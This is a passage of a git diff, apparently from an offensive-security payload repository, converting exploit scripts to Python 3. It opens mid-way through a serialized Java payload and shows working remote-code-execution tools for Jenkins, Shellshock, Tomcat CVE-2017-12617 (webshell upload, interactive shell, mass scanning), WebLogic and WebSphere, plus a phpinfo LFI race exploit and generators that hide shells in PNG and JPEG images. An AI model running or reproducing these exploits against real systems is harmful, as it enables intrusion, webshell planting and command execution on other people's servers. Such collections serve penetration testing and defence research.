x01\xdf\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x39\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x00\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x18\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x6c\x69\x45\x6e\x74\x72\x79\x50\x6f\x69\x6e\x74\x71\x00\x7e\x00\x24\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x74\x00\x1d\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x28\x31\x2c\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x29' sock.send(payload) -print '[+] Sent payload' +print('[+] Sent payload') diff --git a/CVE Exploits/Jenkins CVE-2016-0792.py b/CVE Exploits/Jenkins CVE-2016-0792.py index 70b4709..fdf4163 100644 --- a/CVE Exploits/Jenkins CVE-2016-0792.py +++ b/CVE Exploits/Jenkins CVE-2016-0792.py @@ -4,6 +4,7 @@ #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins #Made with <3 by @byt3bl33d3r +from __future__ import print_function import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) @@ -23,17 +24,17 @@ if len(sys.argv) < 2: args = parser.parse_args() if len(args.target.split(':')) != 2: - print '[-] Target must be in format IP:PORT' + print('[-] Target must be in format IP:PORT') sys.exit(1) if not args.command: - print '[-] You must specify a command to run' + print('[-] You must specify a command to run') sys.exit(1) ip, port = args.target.split(':') -print '[*] Target IP: {}'.format(ip) -print '[*] Target PORT: {}'.format(port) +print('[*] Target IP: {}'.format(ip)) +print('[*] Target PORT: {}'.format(port)) xml_formatted = '' command_list = args.command.split() @@ -67,11 +68,11 @@ xml_payload = ''' '''.format(xml_formatted.strip()) -print '[*] Generated XML payload:' -print xml_payload -print +print('[*] Generated XML payload:') +print(xml_payload) +print() -print '[*] Sending payload' +print('[*] Sending payload') headers = {'Content-Type': 'text/xml'} r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload) @@ -79,5 +80,5 @@ paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml'] if r.status_code == 500: for path in paths_in_trace: if path in r.text: - print '[+] Command executed successfully' + print('[+] Command executed successfully') break diff --git a/CVE Exploits/Jenkins Groovy Console.py b/CVE Exploits/Jenkins Groovy Console.py index 10bc080..2c32fc9 100644 --- a/CVE Exploits/Jenkins Groovy Console.py +++ b/CVE Exploits/Jenkins Groovy Console.py @@ -1,30 +1,32 @@ #!/usr/bin/env python # SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py # DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b +from __future__ import print_function +from builtins import input import requests import sys -print """ +print(""" Jenkins Groovy Console cmd runner. usage: ./jgc.py [HOST] Then type any command and wait for STDOUT output from remote machine. Type 'exit' to exit :) -""" +""") URL = sys.argv[1] + '/scriptText' HEADERS = { 'User-Agent': 'jgc' } while 1: - CMD = raw_input(">> Enter command to execute (or type 'exit' to exit): ") + CMD = input(">> Enter command to execute (or type 'exit' to exit): ") if CMD == 'exit': - print "exiting...\n" + print("exiting...\n") exit(0) DATA = { 'script': 'println "{}".execute().text'.format(CMD) } result = requests.post(URL, headers=HEADERS, data=DATA) - print result.text \ No newline at end of file + print(result.text) \ No newline at end of file diff --git a/CVE Exploits/Shellshock CVE-2014-6271.py b/CVE Exploits/Shellshock CVE-2014-6271.py index 5ca4949..3246c80 100755 --- a/CVE Exploits/Shellshock CVE-2014-6271.py +++ b/CVE Exploits/Shellshock CVE-2014-6271.py @@ -11,22 +11,26 @@ # .. # ~$ /bin/cat /etc/passwd -import sys, urllib2 +from __future__ import print_function +from future import standard_library +standard_library.install_aliases() +from builtins import input +import sys, urllib.request, urllib.error, urllib.parse if len(sys.argv) != 2: - print "Usage: shell_shocker " + print("Usage: shell_shocker ") sys.exit(0) URL=sys.argv[1] -print "[+] Attempting Shell_Shock - Make sure to type full path" +print("[+] Attempting Shell_Shock - Make sure to type full path") while True: - command=raw_input("~$ ") - opener=urllib2.build_opener() + command=input("~$ ") + opener=urllib.request.build_opener() opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] try: response=opener.open(URL) for line in response.readlines(): - print line.strip() - except Exception as e: print e + print(line.strip()) + except Exception as e: print(e) diff --git a/CVE Exploits/Tomcat CVE-2017-12617.py b/CVE Exploits/Tomcat CVE-2017-12617.py index 52b325e..4b72ffb 100755 --- a/CVE Exploits/Tomcat CVE-2017-12617.py +++ b/CVE Exploits/Tomcat CVE-2017-12617.py @@ -7,21 +7,25 @@ options: --u ,--url [::] check target url if it's vulnerable --p,--pwn [::] generate webshell and upload it +-u ,--url [::] check target url if it's vulnerable +-p,--pwn [::] generate webshell and upload it -l,--list [::] hosts list [+]usage: -./cve-2017-12617.py -u http://127.0.0.1 -./cve-2017-12617.py --url http://127.0.0.1 -./cve-2017-12617.py -u http://127.0.0.1 -p pwn -./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn -./cve-2017-12617.py -l hotsts.txt +./cve-2017-12617.py -u http://127.0.0.1 +./cve-2017-12617.py --url http://127.0.0.1 +./cve-2017-12617.py -u http://127.0.0.1 -p pwn +./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn +./cve-2017-12617.py -l hotsts.txt ./cve-2017-12617.py --list hosts.txt """ +from __future__ import print_function +from builtins import input +from builtins import str +from builtins import object import requests import re import signal @@ -34,7 +38,7 @@ from optparse import OptionParser -class bcolors: +class bcolors(object): HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' @@ -50,14 +54,14 @@ class bcolors: banner=""" - _______ ________ ___ ___ __ ______ __ ___ __ __ ______ + _______ ________ ___ ___ __ ______ __ ___ __ __ ______ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | - | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / - | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / - | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / - \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ - - + | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / + | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / + | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / + \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ + + [@intx0x80] @@ -79,9 +83,9 @@ signal.signal(signal.SIGINT, signal_handler) def removetags(tags): - remove = re.compile('<.*?>') - txt = re.sub(remove, '\n', tags) - return txt.replace("\n\n\n","\n") + remove = re.compile('<.*?>') + txt = re.sub(remove, '\n', tags) + return txt.replace("\n\n\n","\n") def getContent(url,f): @@ -94,9 +98,9 @@ def createPayload(url,f): headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers) if req.status_code==201: - print "File Created .." + print("File Created ..") + - def RCE(url,f): EVIL="""
""".format(f)+""" @@ -119,26 +123,26 @@ InputStreamReader(p.getInputStream()));
<%=output %>
""" - + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} - + req=requests.put(str(url)+f+"/",data=EVIL, headers=headers) - + def shell(url,f): - + while True: headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} - cmd=raw_input("$ ") + cmd=input("$ ") payload={'cmd':cmd} if cmd=="q" or cmd=="Q": - break - + break + re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers) re=str(re.content) t=removetags(re) - print t + print(t) @@ -152,21 +156,21 @@ parse=OptionParser( bcolors.HEADER+""" - _______ ________ ___ ___ __ ______ __ ___ __ __ ______ + _______ ________ ___ ___ __ ______ __ ___ __ __ ______ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | - | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / - | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / - | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / - \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ - - + | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / + | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / + | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / + \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ + + ./cve-2017-12617.py [options] options: --u ,--url [::] check target url if it's vulnerable +-u ,--url [::] check target url if it's vulnerable -p,--pwn [::] generate webshell and upload it -l,--list [::] hosts list @@ -187,7 +191,7 @@ options: ) -parse.add_option("-u","--url",dest="U",type="string",help="Website Url") +parse.add_option("-u","--url",dest="U",type="string",help="Website Url") parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it") parse.add_option("-l","--list",dest="L",type="string",help="hosts File") @@ -201,47 +205,35 @@ if opt.U==None and opt.P==None and opt.L==None: else: if opt.U!=None and opt.P==None and opt.L==None: - print bcolors.OKGREEN+banner+bcolors.ENDC - url=str(opt.U) - checker="Poc.jsp" - print bcolors.BOLD +"Poc Filename {}".format(checker) - createPayload(str(url)+"/",checker) - con=getContent(str(url)+"/",checker) - if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: - print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC - print bcolors.WARNING+url+"/"+checker+bcolors.ENDC - - else: - print 'Not Vulnerable to CVE-2017-12617 ' + print(bcolors.OKGREEN+banner+bcolors.ENDC) + url=str(opt.U) + checker="Poc.jsp" + print(bcolors.BOLD +"Poc Filename {}".format(checker)) + createPayload(str(url)+"/",checker) + con=getContent(str(url)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC) + print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC) + + else: + print('Not Vulnerable to CVE-2017-12617 ') elif opt.P!=None and opt.U!=None and opt.L==None: - print bcolors.OKGREEN+banner+bcolors.ENDC - pwn=str(opt.P) - url=str(opt.U) - print "Uploading Webshell ....." - pwn=pwn+".jsp" - RCE(str(url)+"/",pwn) - shell(str(url),pwn) + print(bcolors.OKGREEN+banner+bcolors.ENDC) + pwn=str(opt.P) + url=str(opt.U) + print("Uploading Webshell .....") + pwn=pwn+".jsp" + RCE(str(url)+"/",pwn) + shell(str(url),pwn) elif opt.L!=None and opt.P==None and opt.U==None: - print bcolors.OKGREEN+banner+bcolors.ENDC - w=str(opt.L) - f=open(w,"r") - print "Scaning hosts in {}".format(w) - checker="Poc.jsp" - for i in f.readlines(): - i=i.strip("\n") - createPayload(str(i)+"/",checker) - con=getContent(str(i)+"/",checker) - if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: - print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m" - - - - - - - - - - - - + print(bcolors.OKGREEN+banner+bcolors.ENDC) + w=str(opt.L) + f=open(w,"r") + print("Scaning hosts in {}".format(w)) + checker="Poc.jsp" + for i in f.readlines(): + i=i.strip("\n") + createPayload(str(i)+"/",checker) + con=getContent(str(i)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m") diff --git a/CVE Exploits/WebLogic CVE-2016-3510.py b/CVE Exploits/WebLogic CVE-2016-3510.py index b77ad9b..706e0b1 100644 --- a/CVE Exploits/WebLogic CVE-2016-3510.py +++ b/CVE Exploits/WebLogic CVE-2016-3510.py @@ -4,6 +4,7 @@ #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits) #Made with <3 by @byt3bl33d3r +from __future__ import print_function import socket import struct import argparse @@ -34,29 +35,29 @@ else: ysoserial_path = args.ysoserial_path if len(args.target.split(':')) != 2: - print '[-] Target must be in format IP:PORT' + print('[-] Target must be in format IP:PORT') sys.exit(1) if not args.command: - print '[-] You must specify a command to run' + print('[-] You must specify a command to run') sys.exit(1) ip, port = args.target.split(':') sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -print '[*] Target IP: {}'.format(ip) -print '[*] Target PORT: {}'.format(port) +print('[*] Target IP: {}'.format(ip)) +print('[*] Target PORT: {}'.format(port)) sock.connect((ip, int(port))) # Send headers headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' -print '[*] Sending header' +print('[*] Sending header') sock.sendall(headers) data = sock.recv(1024) -print'[*] Received: "{}"'.format(data) +print('[*] Received: "{}"'.format(data)) payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) @@ -67,5 +68,5 @@ payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f # adjust header for appropriate message length payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) -print '[*] Sending payload' +print('[*] Sending payload') sock.send(payload) diff --git a/CVE Exploits/WebLogic CVE-2017-10271.py b/CVE Exploits/WebLogic CVE-2017-10271.py index 9990f95..71236dd 100644 --- a/CVE Exploits/WebLogic CVE-2017-10271.py +++ b/CVE Exploits/WebLogic CVE-2017-10271.py @@ -1,3 +1,5 @@ +from __future__ import print_function +from builtins import input import requests import sys @@ -44,18 +46,18 @@ def do_post(command_in): result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) if result.status_code == 500: - print "Command Executed \n" + print("Command Executed \n") else: - print "Something Went Wrong \n" + print("Something Went Wrong \n") -print "***************************************************** \n" \ +print("***************************************************** \n" \ "**************** Coded By 1337g ****************** \n" \ "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ - "***************************************************** \n" + "***************************************************** \n") while 1: - command_in = raw_input("Eneter your command here: ") + command_in = input("Eneter your command here: ") if command_in == "exit" : exit(0) do_post(command_in) diff --git a/CVE Exploits/WebLogic CVE-2018-2894.py b/CVE Exploits/WebLogic CVE-2018-2894.py index 0fd904a..18adab0 100755 --- a/CVE Exploits/WebLogic CVE-2018-2894.py +++ b/CVE Exploits/WebLogic CVE-2018-2894.py @@ -2,6 +2,8 @@ # coding:utf-8 # Build By LandGrey +from __future__ import print_function +from builtins import str import re import sys import time diff --git a/CVE Exploits/WebSphere CVE-2015-7450.py b/CVE Exploits/WebSphere CVE-2015-7450.py index d542637..c37215e 100644 --- a/CVE Exploits/WebSphere CVE-2015-7450.py +++ b/CVE Exploits/WebSphere CVE-2015-7450.py @@ -4,6 +4,8 @@ #Based on the nessus plugin websphere_java_serialize.nasl #Made with <3 by @byt3bl33d3r +from __future__ import print_function +from builtins import chr import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) @@ -34,7 +36,7 @@ if not args.command: elif args.command: if len(args.command) > 254: - print '[-] Command must be less then 255 bytes' + print('[-] Command must be less then 255 bytes') sys.exit(1) ip, port = args.target.split(':') @@ -75,4 +77,4 @@ headers = {'Content-Type': 'text/xml; charset=utf-8', 'SOAPAction': 'urn:AdminService'} r = requests.post('{}://{}:{}'.format(args.proto, ip, port), data=xmlObj, headers=headers, verify=False) -print '[*] HTTPS request sent successfully' +print('[*] HTTPS request sent successfully') diff --git a/File inclusion/phpinfolfi.py b/File inclusion/phpinfolfi.py index 7042c31..2f4cc8e 100644 --- a/File inclusion/phpinfolfi.py +++ b/File inclusion/phpinfolfi.py @@ -1,5 +1,7 @@ #!/usr/bin/python # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf +from __future__ import print_function +from builtins import range import sys import threading import socket @@ -83,7 +85,7 @@ class ThreadWorker(threading.Thread): if self.event.is_set(): break if x: - print "\nGot it! Shell created in /tmp/g" + print("\nGot it! Shell created in /tmp/g") self.event.set() except socket.error: @@ -110,23 +112,23 @@ def getOffset(host, port, phpinforeq): if i == -1: raise ValueError("No php tmp_name in phpinfo output") - print "found %s at %i" % (d[i:i+10],i) + print("found %s at %i" % (d[i:i+10],i)) # padded up a bit return i+256 def main(): - print "LFI With PHPInfo()" - print "-=" * 30 + print("LFI With PHPInfo()") + print("-=" * 30) if len(sys.argv) < 2: - print "Usage: %s host [port] [threads]" % sys.argv[0] + print("Usage: %s host [port] [threads]" % sys.argv[0]) sys.exit(1) try: host = socket.gethostbyname(sys.argv[1]) - except socket.error, e: - print "Error with hostname %s: %s" % (sys.argv[1], e) + except socket.error as e: + print("Error with hostname %s: %s" % (sys.argv[1], e)) sys.exit(1) port=80 @@ -134,8 +136,8 @@ def main(): port = int(sys.argv[2]) except IndexError: pass - except ValueError, e: - print "Error with port %d: %s" % (sys.argv[2], e) + except ValueError as e: + print("Error with port %d: %s" % (sys.argv[2], e)) sys.exit(1) poolsz=10 @@ -143,11 +145,11 @@ def main(): poolsz = int(sys.argv[3]) except IndexError: pass - except ValueError, e: - print "Error with poolsz %d: %s" % (sys.argv[3], e) + except ValueError as e: + print("Error with poolsz %d: %s" % (sys.argv[3], e)) sys.exit(1) - print "Getting initial offset...", + print("Getting initial offset...", end=' ') reqphp, tag, reqlfi = setup(host, port) offset = getOffset(host, port, reqphp) sys.stdout.flush() @@ -156,7 +158,7 @@ def main(): e = threading.Event() l = threading.Lock() - print "Spawning worker pool (%d)..." % poolsz + print("Spawning worker pool (%d)..." % poolsz) sys.stdout.flush() tp = [] @@ -174,19 +176,19 @@ def main(): sys.stdout.flush() if counter >= maxattempts: break - print + print() if e.is_set(): - print "Woot! \m/" + print("Woot! \m/") else: - print ":(" + print(":(") except KeyboardInterrupt: - print "\nTelling threads to shutdown..." + print("\nTelling threads to shutdown...") e.set() - print "Shuttin' down..." + print("Shuttin' down...") for t in tp: t.join() if __name__=="__main__": - print "Don't forget to modify the LFI URL" + print("Don't forget to modify the LFI URL") main() diff --git a/File inclusion/uploadlfi.py b/File inclusion/uploadlfi.py index ce910b0..93526d5 100644 --- a/File inclusion/uploadlfi.py +++ b/File inclusion/uploadlfi.py @@ -1,3 +1,5 @@ +from __future__ import print_function +from builtins import range import itertools import requests import string diff --git a/Server Side Request Forgery/Files/ip.py b/Server Side Request Forgery/Files/ip.py index f55959f..52be158 100644 --- a/Server Side Request Forgery/Files/ip.py +++ b/Server Side Request Forgery/Files/ip.py @@ -2,6 +2,10 @@ # coding=utf-8 # https://raw.githubusercontent.com/cujanovic/SSRF-Testing/master/ip.py from __future__ import print_function +from builtins import oct +from builtins import str +from builtins import hex +from builtins import range from random import * from io import open import datetime diff --git a/Upload insecure files/CVE Eicar/eicar.com.txt b/Upload insecure files/CVE Eicar/eicar.com.txt deleted file mode 100644 index a2463df..0000000 --- a/Upload insecure files/CVE Eicar/eicar.com.txt +++ /dev/null @@ -1 +0,0 @@ -X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* \ No newline at end of file diff --git a/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py b/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py index 8a758d8..db9726b 100755 --- a/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py +++ b/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py @@ -1,4 +1,8 @@ #!/usr/bin/env python3 +from builtins import bytes +from builtins import map +from builtins import zip +from builtins import range import struct import argparse import random diff --git a/Upload insecure files/Picture Metadata/Build_image_to_LFI.py b/Upload insecure files/Picture Metadata/Build_image_to_LFI.py index 2bef83f..bffc312 100755 --- a/Upload insecure files/Picture Metadata/Build_image_to_LFI.py +++ b/Upload insecure files/Picture Metadata/Build_image_to_LFI.py @@ -1,3 +1,4 @@ +from __future__ import print_function from PIL import Image # Shellcodes - Bypass included : Keyword Recognition : System, GET, php @@ -9,10 +10,10 @@ shellcode = "" shellcode2 = ";').($_^'/');?>" -print "\n[+] Advanced Upload - Shell inside metadatas of a PNG file" +print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file") # Create a backdoored PNG -print " - Creating a payload.png" +print(" - Creating a payload.png") im = Image.new("RGB", (10,10), "Black") im.info["shell"] = shellcode reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect') @@ -22,9 +23,9 @@ from PIL import PngImagePlugin meta = PngImagePlugin.PngInfo() # copy metadata into new object -for k,v in im.info.iteritems(): +for k,v in im.info.items(): if k in reserved: continue meta.add_text(k, v, 0) im.save("payload.png", "PNG", pnginfo=meta) -print "Done" \ No newline at end of file +print("Done") \ No newline at end of file diff --git a/Upload insecure files/Picture Resize/exploit_JPG.py b/Upload insecure files/Picture Resize/exploit_JPG.py index 77951db..14b8a09 100755 --- a/Upload insecure files/Picture Resize/exploit_JPG.py +++ b/Upload insecure files/Picture Resize/exploit_JPG.py @@ -20,10 +20,14 @@ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. """ +from __future__ import print_function +from future import standard_library +standard_library.install_aliases() +from builtins import range import struct,sys,os import gd -from StringIO import StringIO +from io import StringIO from random import randint,shuffle from time import time @@ -51,22 +55,22 @@ def insertPayload(_in, _out, payload,off): if __name__=='__main__': - print "[+] Virtualabs' Nasty bulletproof Jpeg generator" - print " | website: http://virtualabs.fr" - print " | contact: virtualabs -at- gmail -dot- com" - print "" + print("[+] Virtualabs' Nasty bulletproof Jpeg generator") + print(" | website: http://virtualabs.fr") + print(" | contact: virtualabs -at- gmail -dot- com") + print("") payloads = ["","","",""] # make sure the exploit-jpg directory exists or create it if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'): - print "[!] Please remove the file named 'exploit-jpg' from the current directory" + print("[!] Please remove the file named 'exploit-jpg' from the current directory") elif not os.path.exists('exploit-jpg'): os.mkdir('exploit-jpg') # start generation - print '[i] Generating ...' - for q in range(50,100)+[-1]: + print('[i] Generating ...') + for q in list(range(50,100))+[-1]: # loop over every payload for p in payloads: # not done yet @@ -113,10 +117,10 @@ if __name__=='__main__': # does it contain our payload ? if p in final_raw: # Yay ! - print '[i] Jpeg quality %d ... DONE'%q + print('[i] Jpeg quality %d ... DONE'%q) done = True break - except IOError,e: + except IOError as e: pass else: break